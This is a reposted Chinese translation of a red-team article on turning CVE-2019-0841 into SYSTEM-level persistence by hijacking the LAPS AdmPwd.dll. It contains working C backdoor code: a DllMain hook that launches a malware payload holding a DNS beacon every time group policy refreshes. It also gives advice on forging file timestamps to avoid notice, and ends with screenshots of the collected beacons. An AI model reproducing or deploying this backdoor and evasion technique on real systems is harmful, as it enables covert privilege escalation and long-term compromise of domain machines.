1. 首页
  2. 文章中心
  3. 提权

利用LAPS武器化CVE-2019-0841

63 阅读 0 评论
我是靠谱客的博主 朴实鞋子,最近开发中收集的这篇文章主要介绍利用LAPS武器化CVE-2019-0841,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

22.png

4月9日,Nabeel Ahmed公布了CVE-2019-0841漏洞的细节。它可让低权限用户完全控制NT AUTHORITYSYSTEM所属的文件,易引发权限提升攻击。Nabeel发布了一篇博客文章,详细描述了漏洞,并且还带有PoC代码和演示视频。

从视频中我们可以看到,一个低权限用户完全控制了psmachine.dll,然后利用谷歌Chrome的更新服务获得了一个SYSTEM权限的shell。但是,视频中的一系列操作在实际渗透操作中显然是很困难的,所以我和RythmStick一起尝试把这个权限提升方法模拟应用在实际渗透过程中。

不同于视频中利用Chrome浏览器作为攻击中介,RythmStick这次找到了LAPS作为我们的利用目标。

LAPS(Local Administrator Password Solution),本地管理员密码管理方案,用来集中管理域内主机本地管理员的口令,微软2015年发布。

我们已经知道了一些滥用LAPS的方法,而这次我们想利用一个DLL文件来创造一个system权限的shell。

本地计算机通过`AdmPwd.dll`执行所有LAPS功能,而且此DLL没有完整性检查,可以被修改替换。

开端

在我们的演示中,有一个HTTP Beacon,可看作一个低权限用户。该用户肯定不是本地管理员。

33.png

首先,让我们看看AdmPwd.dll的相关权限,以证明我们目前无法控制它。

44.png

CVE-2019-0841

Nabeel的PoC是用C语言编写的,所以我们必须将它上传到目标机器上运行。

55.png66.png

再次检查文件的权限,现在,我们已完全控制了该文件。

77.png

AdmPwd.dll

此时,你可以将后门放置在你喜欢的任何位置,具体取决于你希望的后门触发条件。我们选择利用DllMain,以便在每个gpupdate(组策略刷新)时触发,但我认为将其在密码重置时触发是一个更有趣的权限维持方法。

因为我C语言能力很糟糕,所以只编写了一个非常简单的操作CreateProcess,它会以system权限运行一个恶意软件TikiSpawn.exe,里面包含了DNS Beacon的payload。

void Backdoor()
{
STARTUPINFO sInfo;
PROCESS_INFORMATION pInfo;
RtlSecureZeroMemory(&sInfo, sizeof(sInfo));
RtlSecureZeroMemory(&pInfo, sizeof(pInfo));
sInfo.cb = sizeof(sInfo);
GetStartupInfoW(&sInfo);
CreateProcess(L"C:\Windows\System32\Tasks\TikiSpawn.exe", NULL, NULL, NULL, FALSE, NULL, NULL, L"C:\Windows\System32",
&sInfo, &pInfo);
CloseHandle(pInfo.hProcess);
CloseHandle(pInfo.hThread);
return;
}
//DllMain, Installation, Uninstallation
BOOL APIENTRY DllMain( HANDLE hModule, DWORD
ul_reason, LPVOID lpReserved) {
if(ul_reason==DLL_PROCESS_ATTACH) {
Backdoor();
hDll=(HINSTANCE)hModule;
}
return TRUE;
}

覆盖DLL文件是非常简单的,直接进入文件夹C:Program FilesLAPSCSE,上传即可。

88.png

时间戳

这时,你还可以修改其时间戳,让它看起来更合理。如果机器已安装了LAPS的UI,那么可以把时间戳修改的和AdmPwd.Utils.dll一样。

99.png

100.png

请注意,上图中CSE目录的04/13/2019是LAPS的安装日期。

GPUpdate

在组策略刷新之后,我们获得了DNS Beacon。

110.png

120.png

以下就是Beacon在Process Explorer中的表现。看起来和系统自启动的正常程序很相似,虽然也有一些其他的问题(我也许会另写一篇文章来说明)。

130.png

在几个小时后,我们得到了一堆Beacon。

140.png

感谢你的阅读!

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场:https://nosec.org/home/detail/2534.html
来源:https://rastamouse.me/2019/04/weaponizing-cve-2019-0841-with-laps/

最后

以上就是朴实鞋子为你收集整理的利用LAPS武器化CVE-2019-0841的全部内容,希望文章能够帮你解决利用LAPS武器化CVE-2019-0841所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(42)

相关文章

OneAPM 重磅登陆 CTDC 2018展示“ AIOps 双雄”创新实力
OneAPM 重磅登陆 CTDC 2018展示“ AIOps 双雄”创新实力
解析技术雷达五大主题|2017技术雷达峰会
解析技术雷达五大主题|2017技术雷达峰会
技术驱动商业未来 怪兽充电获CTDC年度最具技术创新产品奖
技术驱动商业未来 怪兽充电获CTDC年度最具技术创新产品奖
首席技术官领袖峰会CTDC2017在乌镇圆满召开
首席技术官领袖峰会CTDC2017在乌镇圆满召开
利用LAPS武器化CVE-2019-0841
利用LAPS武器化CVE-2019-0841
安全狗漏洞通告|Linux Snap 权限提升漏洞
安全狗漏洞通告|Linux Snap 权限提升漏洞
Windows本地提权0day(支持WEBSHELL测试版)
Windows本地提权0day(支持WEBSHELL测试版)
CAcls命令在提权中的使用
CAcls命令在提权中的使用

评论列表共有 0 条评论

立即
投稿
返回
顶部